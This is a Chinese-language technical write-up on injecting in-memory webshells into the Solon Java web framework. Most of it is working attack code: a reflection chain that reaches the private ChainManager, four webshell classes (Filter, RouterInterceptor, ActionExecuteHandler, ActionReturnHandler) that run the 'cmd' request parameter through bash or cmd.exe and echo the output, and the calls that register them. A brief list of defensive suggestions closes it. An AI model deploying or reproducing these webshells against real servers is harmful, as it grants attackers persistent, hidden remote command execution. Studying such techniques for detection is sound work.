Solon框架内存马注入技术分析<\/h1>

1. Solon框架简介<\/h2>
Solon是一个纯国产的Java应用开发框架，类似于Spring Boot，具有以下特点：<\/p>
官网：https:\/\/solon.noear.org<\/a><\/li> <\/ul>
2. 内存马注入技术分析<\/h2>

2.1 Filter内存马注入<\/h3>

@Component<\/span>(<\/span>index =<\/span> 0<\/span>)<\/span> \/\/index为顺序位(不加则默认为0)
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> FilterDemo<\/span> implements<\/span> Filter {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>Context ctx,<\/span> FilterChain chain)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>ctx.<\/span>path<\/span>());<\/span> \/\/输出当前访问路径
<\/span><\/span><\/span><\/span>        chain.<\/span>doFilter<\/span>(<\/span>ctx);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.1.2 Filter添加流程分析<\/h4>

Filter通过ChainManager.addFilter()<\/code>或addFilterIfAbsent()<\/code>方法添加<\/li>
SolonApp.tryHandle()<\/code>方法调用RouterWrapper.chainManager()<\/code><\/li>
最终由ChainManager<\/code>对象管理Filter链<\/li>
<\/ol>
2.1.3 获取ChainManager对象<\/h4>
通过反射获取_chainManager<\/code>字段：<\/p>
Context ctx =<\/span> Context.<\/span>current<\/span>();<\/span>
<\/span><\/span>Object _request =<\/span> getfieldobj(<\/span>ctx,<\/span> "_request"<\/span>);<\/span>
<\/span><\/span>Object request =<\/span> getfieldobj(<\/span>_request,<\/span> "request"<\/span>);<\/span>
<\/span><\/span>Object serverHandler =<\/span> getfieldobj(<\/span>request,<\/span> "serverHandler"<\/span>);<\/span>
<\/span><\/span>Object handler =<\/span> getfieldobj(<\/span>serverHandler,<\/span> "handler"<\/span>);<\/span>
<\/span><\/span>Object arg$1 =<\/span> getfieldobj(<\/span>handler,<\/span> "arg$1"<\/span>);<\/span>
<\/span><\/span>ChainManager _chainManager =<\/span> (<\/span>ChainManager)<\/span> getfieldobj(<\/span>arg$1,<\/span> "_chainManager"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>辅助方法getfieldobj<\/code>：<\/p>
public<\/span> Object getfieldobj<\/span>(<\/span>Object obj,<\/span> String Filename)<\/span> throws<\/span> NoSuchFieldException,<\/span> IllegalAccessException {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>Filename);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object fieldobj =<\/span> field.<\/span>get<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        return<\/span> fieldobj;<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>NoSuchFieldException e)<\/span> {<\/span>
<\/span><\/span>        Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>Filename);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object fieldobj =<\/span> field.<\/span>get<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        return<\/span> fieldobj;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.1.4 恶意Filter实现<\/h4>
public<\/span> class<\/span> Memshellclass<\/span> implements<\/span> Filter {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>Context ctx,<\/span> FilterChain chain)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>)!=<\/span> null<\/span>){<\/span>
<\/span><\/span>                String str =<\/span> ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    String[]<\/span> cmds =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)<\/span> 
<\/span><\/span>                        ?<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> str}<\/span> 
<\/span><\/span>                        :<\/span> new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span> "-c"<\/span>,<\/span> str};<\/span>
<\/span><\/span>                    String output =<\/span> new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>
<\/span><\/span>                        new<\/span> ProcessBuilder(<\/span>cmds).<\/span>start<\/span>().<\/span>getInputStream<\/span>()<\/span>
<\/span><\/span>                    ).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>).<\/span>next<\/span>();<\/span>
<\/span><\/span>                    ctx.<\/span>output<\/span>(<\/span>output);<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>                    e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Throwable e){<\/span>
<\/span><\/span>            ctx.<\/span>output<\/span>(<\/span>e.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        chain.<\/span>doFilter<\/span>(<\/span>ctx);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.1.5 注入Filter内存马<\/h4>
_chainManager.<\/span>addFilter<\/span>(<\/span>new<\/span> Memshellclass(),<\/span> 0<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2.2 RouterInterceptor内存马注入<\/h3>
2.2.1 注入方法<\/h4>
_chainManager.<\/span>addInterceptor<\/span>(<\/span>new<\/span> RouterInterceptormemshell(),<\/span> 0<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2.2.2 恶意RouterInterceptor实现<\/h4>
public<\/span> class<\/span> RouterInterceptormemshell<\/span> implements<\/span> RouterInterceptor {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> PathRule pathPatterns<\/span>()<\/span> {<\/span>
<\/span><\/span>        return<\/span> new<\/span> PathRule().<\/span>include<\/span>(<\/span>"\/hello"<\/span>);<\/span> \/\/限定路径，可以为return null作用于全路径
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doIntercept<\/span>(<\/span>Context ctx,<\/span> Handler mainHandler,<\/span> RouterInterceptorChain chain)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>)!=<\/span> null<\/span>){<\/span>
<\/span><\/span>                String str =<\/span> ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    String[]<\/span> cmds =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)<\/span> 
<\/span><\/span>                        ?<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> str}<\/span> 
<\/span><\/span>                        :<\/span> new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span> "-c"<\/span>,<\/span> str};<\/span>
<\/span><\/span>                    String output =<\/span> new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>
<\/span><\/span>                        new<\/span> ProcessBuilder(<\/span>cmds).<\/span>start<\/span>().<\/span>getInputStream<\/span>()<\/span>
<\/span><\/span>                    ).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>).<\/span>next<\/span>();<\/span>
<\/span><\/span>                    ctx.<\/span>output<\/span>(<\/span>output);<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>                    e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Throwable e){<\/span>
<\/span><\/span>            ctx.<\/span>output<\/span>(<\/span>e.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        chain.<\/span>doIntercept<\/span>(<\/span>ctx,<\/span> mainHandler);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 ActionExecuteHandler内存马注入<\/h3>
2.3.1 注入方法<\/h4>
_chainManager.<\/span>addExecuteHandler<\/span>(<\/span>new<\/span> ActionExecuteHandlermemshell());<\/span>
<\/span><\/span><\/code><\/pre>2.3.2 恶意ActionExecuteHandler实现<\/h4>
public<\/span> class<\/span> ActionExecuteHandlermemshell<\/span> implements<\/span> ActionExecuteHandler {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> boolean<\/span> matched<\/span>(<\/span>Context ctx,<\/span> String contentType)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>)!=<\/span> null<\/span>){<\/span>
<\/span><\/span>                String str =<\/span> ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    String[]<\/span> cmds =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)<\/span> 
<\/span><\/span>                        ?<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> str}<\/span> 
<\/span><\/span>                        :<\/span> new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span> "-c"<\/span>,<\/span> str};<\/span>
<\/span><\/span>                    String output =<\/span> new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>
<\/span><\/span>                        new<\/span> ProcessBuilder(<\/span>cmds).<\/span>start<\/span>().<\/span>getInputStream<\/span>()<\/span>
<\/span><\/span>                    ).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>).<\/span>next<\/span>();<\/span>
<\/span><\/span>                    ctx.<\/span>output<\/span>(<\/span>output);<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>                    e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Throwable e){<\/span>
<\/span><\/span>            ctx.<\/span>output<\/span>(<\/span>e.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> false<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> Object[]<\/span> resolveArguments<\/span>(<\/span>Context ctx,<\/span> Object target,<\/span> MethodWrap mWrap)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        return<\/span> new<\/span> Object[<\/span>0<\/span>];<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> Object executeHandle<\/span>(<\/span>Context ctx,<\/span> Object target,<\/span> MethodWrap mWrap)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.4 ActionReturnHandler内存马注入<\/h3>
2.4.1 注入方法<\/h4>
_chainManager.<\/span>addReturnHandler<\/span>(<\/span>new<\/span> ActionReturnHandlermemshell());<\/span>
<\/span><\/span><\/code><\/pre>2.4.2 恶意ActionReturnHandler实现<\/h4>
public<\/span> class<\/span> ActionReturnHandlermemshell<\/span> implements<\/span> ActionReturnHandler {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> boolean<\/span> matched<\/span>(<\/span>Class<?><\/span> returnType)<\/span> {<\/span>
<\/span><\/span>        return<\/span> true<\/span>;<\/span> \/\/为true时才回让returnHandle处理
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> returnHandle<\/span>(<\/span>Context ctx,<\/span> Action action,<\/span> Object returnValue)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>)!=<\/span> null<\/span>){<\/span>
<\/span><\/span>                String str =<\/span> ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    String[]<\/span> cmds =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)<\/span> 
<\/span><\/span>                        ?<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> str}<\/span> 
<\/span><\/span>                        :<\/span> new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span> "-c"<\/span>,<\/span> str};<\/span>
<\/span><\/span>                    String output =<\/span> new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>
<\/span><\/span>                        new<\/span> ProcessBuilder(<\/span>cmds).<\/span>start<\/span>().<\/span>getInputStream<\/span>()<\/span>
<\/span><\/span>                    ).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>).<\/span>next<\/span>();<\/span>
<\/span><\/span>                    ctx.<\/span>output<\/span>(<\/span>output);<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>                    e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Throwable e){<\/span>
<\/span><\/span>            ctx.<\/span>output<\/span>(<\/span>e.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 其他可能的注入点<\/h2>

Interceptor内存马<\/strong>：按照请求处理流程图，理论上可以注入Interceptor内存马<\/li>
Handler内存马<\/strong>：可以尝试注入Handler内存马<\/li>
传统Web组件<\/strong>：

WebServlet内存马<\/li>
WebFilter内存马<\/li>
JSP内存马（如果支持）<\/li>
<\/ul>
<\/li>
<\/ol>
4. 防御建议<\/h2>

监控和限制反射调用<\/li>
检查ChainManager的修改操作<\/li>
实施运行时应用自我保护(RASP)<\/li>
定期更新框架版本<\/li>
实施最小权限原则<\/li>
<\/ol>
5. 总结<\/h2>
Solon框架的内存马注入主要通过操纵ChainManager对象来实现，可以注入多种类型的内存马，包括Filter、RouterInterceptor、ActionExecuteHandler和ActionReturnHandler等。防御这类攻击需要从多个层面进行防护，包括代码审计、运行时监控和框架更新等。<\/p>